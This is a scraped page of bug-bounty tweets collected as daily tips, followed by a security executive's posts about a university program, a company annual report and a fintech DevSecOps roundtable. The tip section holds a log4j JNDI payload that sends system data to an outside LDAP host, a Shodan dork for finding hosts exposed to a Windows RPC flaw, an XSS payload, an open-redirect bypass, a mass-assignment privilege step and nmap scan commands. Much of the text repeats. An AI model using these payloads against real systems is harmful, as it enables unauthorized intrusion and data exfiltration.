🧨 Windows RPC Critical Vulnerability (CVE-2022-26809) You can search for vulnerable hosts in Shodan by dorks: port:445 product:"Microsoft RPC Endpoint Mapper" Link to PoC https://t.co/AXQC2W0rmU #bugbountytips #CVE #cybersecurity #infosec #bugbounty https://t.co/r7uf5eWgji
---
(WEF - 802.11 Offensive Framework To Automate Attacks for WPA, WEP, Hash Cracking, Bluetooth Hacking & More) - https://t.co/dwhlbrYK9H #infosec #netsec #pentest #cybersecurity #bugbounty https://t.co/nlSnMICPaf
---
New RCE log4j with @GodfatherOrwa Paylaod : ${jndi:ldap://${Command}XXXX${::-.} https://t.co/CSf4toAzvx}zzzz Command sys:os.arch & sys:os.version & hostName #bugbountytips #bugbountytip #bugbounty
---
toxssin☣️A POST-XSS exploitation tool. » https://t.co/MnYBAafnon #cybersecurity #bugbounty #infosec #bugbountytips #xss https://t.co/MFUCvuQq2X
---
16 Search Engines for Pentester and Security Professionals 👇💣 Credits: @NandanLohitaksh #searchengine #attacksurface #recontips #bugbountytips #reconone https://t.co/A6tUqpT9VH
---
Found a Method by which I Got Some Database Credentials leaks Recently "Quick Tips" Or "writeups" #bugbounty #cybersecurity #Hackingtime https://t.co/atRsBJY7z0
---
Hello #BugBounty community, this is my first writeup about account take over hope you like #infosecurity #bugbountytips https://t.co/O5hUBbuSah
---
Today it's been 4 years working on @Bugcrowd . I have so many great memories with @Bugcrowd, I remember my first bounty there, The first time I could change my Laptop, and remember when I could spend my summer in a new country, remember when I bought my first car. #BugBounty
---
Nmap reconnaissance for the win 🔥🔥🔥 nmap --script default,safe,discovery -p 80,443,8080,8443,9000,9001,9002,9003,8888,8088,8880,3000 -n -T4 -iL hosts.txt -oN output #bugbountytips #bugbountytip #bugbounty
🧨 Windows RPC Critical Vulnerability (CVE-2022-26809) You can search for vulnerable hosts in Shodan by dorks: port:445 product:"Microsoft RPC Endpoint Mapper" Link to PoC https://t.co/AXQC2W0rmU #bugbountytips #CVE #cybersecurity #infosec #bugbounty https://t.co/r7uf5eWgji
---
(WEF - 802.11 Offensive Framework To Automate Attacks for WPA, WEP, Hash Cracking, Bluetooth Hacking & More) - https://t.co/dwhlbrYK9H #infosec #netsec #pentest #cybersecurity #bugbounty https://t.co/nlSnMICPaf
---
New RCE log4j with @GodfatherOrwa Paylaod : ${jndi:ldap://${Command}XXXX${::-.} https://t.co/CSf4toAzvx}zzzz Command sys:os.arch & sys:os.version & hostName #bugbountytips #bugbountytip #bugbounty
---
toxssin☣️A POST-XSS exploitation tool. » https://t.co/MnYBAafnon #cybersecurity #bugbounty #infosec #bugbountytips #xss https://t.co/MFUCvuQq2X
---
16 Search Engines for Pentester and Security Professionals 👇💣 Credits: @NandanLohitaksh #searchengine #attacksurface #recontips #bugbountytips #reconone https://t.co/A6tUqpT9VH
---
Found a Method by which I Got Some Database Credentials leaks Recently "Quick Tips" Or "writeups" #bugbounty #cybersecurity #Hackingtime https://t.co/atRsBJY7z0
---
Hello #BugBounty community, this is my first writeup about account take over hope you like #infosecurity #bugbountytips https://t.co/O5hUBbuSah
---
Today it's been 4 years working on @Bugcrowd . I have so many great memories with @Bugcrowd, I remember my first bounty there, The first time I could change my Laptop, and remember when I could spend my summer in a new country, remember when I bought my first car. #BugBounty
---
Nmap reconnaissance for the win 🔥🔥🔥 nmap --script default,safe,discovery -p 80,443,8080,8443,9000,9001,9002,9003,8888,8088,8880,3000 -n -T4 -iL hosts.txt -oN output #bugbountytips #bugbountytip #bugbounty
GitHub
GitHub - s1ckb017/PoC-CVE-2022-26809: PoC for CVE-2022-26809, analisys and considerations are shown in the github.io.
PoC for CVE-2022-26809, analisys and considerations are shown in the github.io. - GitHub - s1ckb017/PoC-CVE-2022-26809: PoC for CVE-2022-26809, analisys and considerations are shown in the github.io.
#BugBountyTips of the Day
New Write-up on InfoSec Write-ups publication : "LDAP in Active Directory" #bugbounty #bugbountywriteup #bugbountytips https://t.co/Al8MbrognT
---
Tips Rxss : --><svg onload=alert(document.domain)> #bugbountytips https://t.co/VxseOgZE3u
---
If your repeater tab is not like this then you are doing something wrong x) #Burpsuite #Bugbounty https://t.co/kbQtmiRXlH
New Write-up on InfoSec Write-ups publication : "LDAP in Active Directory" #bugbounty #bugbountywriteup #bugbountytips https://t.co/Al8MbrognT
---
Tips Rxss : --><svg onload=alert(document.domain)> #bugbountytips https://t.co/VxseOgZE3u
---
If your repeater tab is not like this then you are doing something wrong x) #Burpsuite #Bugbounty https://t.co/kbQtmiRXlH
Medium
LDAP in Active Directory
This article provides a basic overview of the Lightweight Directory Access Protocol (LDAP). In this article, we will explore the basic…
#BugBountyTips of the Day
(Uncover -Quickly discover exposed hosts on the internet using multiple search engines.) - https://t.co/XtwiJFvb6i #infosec #netsec #pentest #cybersecurity #bugbounty https://t.co/F5y0xgD00X
---
Recon Tools for Web Application Pentesting... :) Credits ~ Khalid Maina A Thread 🧵 ↓ #cybersecurity #infosec #pentesting #bugbounty
---
Do you need to scan open ports passively? naabu, a fast #CLI #tool, searches the target on @shodanhq 's Internetdb in passive mode. https://t.co/xKk1Exk1aM @pdiscoveryio #OSINT #Shodan #bugbounty #passivescan #reconnaissance #infosec #cybersecurity https://t.co/J83dtNs81j
---
Mass Account Takeovers using HTTP Request Smuggling 👻 #bugbountytips 🧵👇🏻
---
Best of Nmap Cheat Sheet Credit: @mohamedmaly #infosec #cybersecurity #pentesting #oscp #informationsecurity #hacking #cissp #redteam #technology #DataSecurity #CyberSec #Hackers #tools #bugbountytips #Linux #websecurity #Network #NetworkSecurity https://t.co/kT5N7fSeXm
(Uncover -Quickly discover exposed hosts on the internet using multiple search engines.) - https://t.co/XtwiJFvb6i #infosec #netsec #pentest #cybersecurity #bugbounty https://t.co/F5y0xgD00X
---
Recon Tools for Web Application Pentesting... :) Credits ~ Khalid Maina A Thread 🧵 ↓ #cybersecurity #infosec #pentesting #bugbounty
---
Do you need to scan open ports passively? naabu, a fast #CLI #tool, searches the target on @shodanhq 's Internetdb in passive mode. https://t.co/xKk1Exk1aM @pdiscoveryio #OSINT #Shodan #bugbounty #passivescan #reconnaissance #infosec #cybersecurity https://t.co/J83dtNs81j
---
Mass Account Takeovers using HTTP Request Smuggling 👻 #bugbountytips 🧵👇🏻
---
Best of Nmap Cheat Sheet Credit: @mohamedmaly #infosec #cybersecurity #pentesting #oscp #informationsecurity #hacking #cissp #redteam #technology #DataSecurity #CyberSec #Hackers #tools #bugbountytips #Linux #websecurity #Network #NetworkSecurity https://t.co/kT5N7fSeXm
SkyNet Tools
Uncover -Quickly discover exposed hosts on the internet using multiple search engines.
uncover is a go wrapper using APIs of well known search engines to quickly discover exposed hosts on the internet. It is built with automation in mind, so you c
#BugBountyTips of the Day
Hacking Checklist ✅ - - #infosec #CyberSecurity #bugbountytips #CTF https://t.co/uxfEjnFTtj
---
I earned $800 for my submission on @bugcrowd #ItTakesACrowd Tips: 1) Used Gau To Get All The URLS 2) Used grep = Filtered Only URLS with Parameter 3) Used KXSS Got Reflection Allowing " < > ' 5) Tested XSS 6) Boom! #bugbounty #bugbountytip https://t.co/TsuhIftgbL
---
I earned $1800 for my submission on @bugcrowd #ItTakesACrowd #BugBounty https://t.co/98B2qRLWuL
---
Url redirection bypass I will try... #bugbounty https://x. site. com/bing.com (404) https://x. site. com///bing.com/? (404 not found) finally--> https://x. site. com/bing.com/?q (success):) #urlredirection
---
#bugbountytips #bugbounty I just published Java Application -Server Side Template Injection #Java #RCE More.. https://t.co/3ieYPIFHxn https://t.co/OOQKNQQCSW
---
This is my quick nmap setup, to scan critical ports at fast rate 💪🏻🔥 #portscan #attacksurface #recontips #bugbountytips #recon #nmap https://t.co/M9VRPLFFdr
---
New Write-up on InfoSec Write-ups publication : "Google Dorks: An Advanced Hacking Tool" #bugbounty #bugbountywriteup #bugbountytips https://t.co/eQJkI4zMH5
---
Mass assignment vulnerability in 1 step: ✅ ▶️ Intercept the request while login: { "name":"test”,”email":"test@abc.com","password”:"testing” } ▶️Modify the request above request like: { “name”:"test”,"email”:"test@abc.com”,"password”:"testing”,isAdmin”:true } #bugbounty #infosec
---
[story of September 2021] #bugbounty #bugbountytip This is how I found 40 open redirection in 2 weeks. Bugcrowd accept open redirect as P4🧵 1. I collected all *,main domains 2. Used passive subdomain finding tools to find domains 1/n
---
(1/2) A tool for collecting subdomains and searching for vulnerabilities https://t.co/EUcGAF7CYf #cybersecurity #bugbounty #bugbountytips #infosec #web #xss #garud #sql
Hacking Checklist ✅ - - #infosec #CyberSecurity #bugbountytips #CTF https://t.co/uxfEjnFTtj
---
I earned $800 for my submission on @bugcrowd #ItTakesACrowd Tips: 1) Used Gau To Get All The URLS 2) Used grep = Filtered Only URLS with Parameter 3) Used KXSS Got Reflection Allowing " < > ' 5) Tested XSS 6) Boom! #bugbounty #bugbountytip https://t.co/TsuhIftgbL
---
I earned $1800 for my submission on @bugcrowd #ItTakesACrowd #BugBounty https://t.co/98B2qRLWuL
---
Url redirection bypass I will try... #bugbounty https://x. site. com/bing.com (404) https://x. site. com///bing.com/? (404 not found) finally--> https://x. site. com/bing.com/?q (success):) #urlredirection
---
#bugbountytips #bugbounty I just published Java Application -Server Side Template Injection #Java #RCE More.. https://t.co/3ieYPIFHxn https://t.co/OOQKNQQCSW
---
This is my quick nmap setup, to scan critical ports at fast rate 💪🏻🔥 #portscan #attacksurface #recontips #bugbountytips #recon #nmap https://t.co/M9VRPLFFdr
---
New Write-up on InfoSec Write-ups publication : "Google Dorks: An Advanced Hacking Tool" #bugbounty #bugbountywriteup #bugbountytips https://t.co/eQJkI4zMH5
---
Mass assignment vulnerability in 1 step: ✅ ▶️ Intercept the request while login: { "name":"test”,”email":"test@abc.com","password”:"testing” } ▶️Modify the request above request like: { “name”:"test”,"email”:"test@abc.com”,"password”:"testing”,isAdmin”:true } #bugbounty #infosec
---
[story of September 2021] #bugbounty #bugbountytip This is how I found 40 open redirection in 2 weeks. Bugcrowd accept open redirect as P4🧵 1. I collected all *,main domains 2. Used passive subdomain finding tools to find domains 1/n
---
(1/2) A tool for collecting subdomains and searching for vulnerabilities https://t.co/EUcGAF7CYf #cybersecurity #bugbounty #bugbountytips #infosec #web #xss #garud #sql
X (formerly Twitter)
Ryan M. Montgomery (@0dayCTF) on X
Hacking Checklist ✅
-
-
#infosec #CyberSecurity #bugbountytips #CTF
-
-
#infosec #CyberSecurity #bugbountytips #CTF
Add even more value to the information and cyber security education program. Integrate the hands-on experience required in production into the traditional training system. Address qualified staff shortages while maintaining the fundamental requirements of educational standards.
In 2020, the three objectives were defined. In December 2022, with partner companies, we launched the postgraduate program at my alma mater - National Research Nuclear University MEPhI. In the Academic Director role, I'm proud to integrate the worlds of industry and academia.
@makrushin
In 2020, the three objectives were defined. In December 2022, with partner companies, we launched the postgraduate program at my alma mater - National Research Nuclear University MEPhI. In the Academic Director role, I'm proud to integrate the worlds of industry and academia.
@makrushin
report_v.2023.4: release candidate
Sit next to me. Let's discuss and prepare our annual report. Highlight the ones that made you feel the most, not just list the results. Let's do it in “parameter: value” format.
Capital: 160 researchers and developers have joined our team. All of them lead our company at the cutting edge of technology.
Managed Services: Security Operations Center rebuilt and released, 3 new services launched (Managed VPN, Anti-DDoS, Security Awareness).
Products: ASOC secure development platform released and pilot of Cloud & Container Security platform successfully completed.
Key research project: Advanced Research Team (ART), discovered vulnerability in Windows OS and GitHub repository takeover issues.
Sharing: "Career Pathways in Information Security" course prepared for MEPhI students. 4 lectures published in "open source". Let it engage anyone who has decided to dig deeper into information security.
Key insight: discovered the theory of inventive problem solving (TIPS or TRIZ) in the context of management decision making.
Key result: we got to know each other.
Happy New Year!
@makrushin
Sit next to me. Let's discuss and prepare our annual report. Highlight the ones that made you feel the most, not just list the results. Let's do it in “parameter: value” format.
Capital: 160 researchers and developers have joined our team. All of them lead our company at the cutting edge of technology.
Managed Services: Security Operations Center rebuilt and released, 3 new services launched (Managed VPN, Anti-DDoS, Security Awareness).
Products: ASOC secure development platform released and pilot of Cloud & Container Security platform successfully completed.
Key research project: Advanced Research Team (ART), discovered vulnerability in Windows OS and GitHub repository takeover issues.
Sharing: "Career Pathways in Information Security" course prepared for MEPhI students. 4 lectures published in "open source". Let it engage anyone who has decided to dig deeper into information security.
Key insight: discovered the theory of inventive problem solving (TIPS or TRIZ) in the context of management decision making.
Key result: we got to know each other.
Happy New Year!
@makrushin
DevOpsConf 2024: Secure SDL in Fintech
Secure software development lifecycle (SSDL) is an increasingly important part of the technology landscape of organisations. The FinDevSecOps community was created in 2023 on the platform of the FinTech Association, with the support Moscow Exchange, to unite the efforts of financial market participants and open source communities in the direction of application security.
At the DevOpsConf 2024 roundtable, we will discuss the current challenges of SSDL and collaboration between key stakeholders in the financial industry:
1. TTM and AppSec: Does implementing DevSecOps processes and tools increase cycle time? How to balance business and security needs?
2. InfoSec vs. IT or together with IT? What's the security strategy in a financial organisation?
3. What is the difference between SSDL in fintech and SSDL in non-financial companies?
@makrushin
Secure software development lifecycle (SSDL) is an increasingly important part of the technology landscape of organisations. The FinDevSecOps community was created in 2023 on the platform of the FinTech Association, with the support Moscow Exchange, to unite the efforts of financial market participants and open source communities in the direction of application security.
At the DevOpsConf 2024 roundtable, we will discuss the current challenges of SSDL and collaboration between key stakeholders in the financial industry:
1. TTM and AppSec: Does implementing DevSecOps processes and tools increase cycle time? How to balance business and security needs?
2. InfoSec vs. IT or together with IT? What's the security strategy in a financial organisation?
3. What is the difference between SSDL in fintech and SSDL in non-financial companies?
@makrushin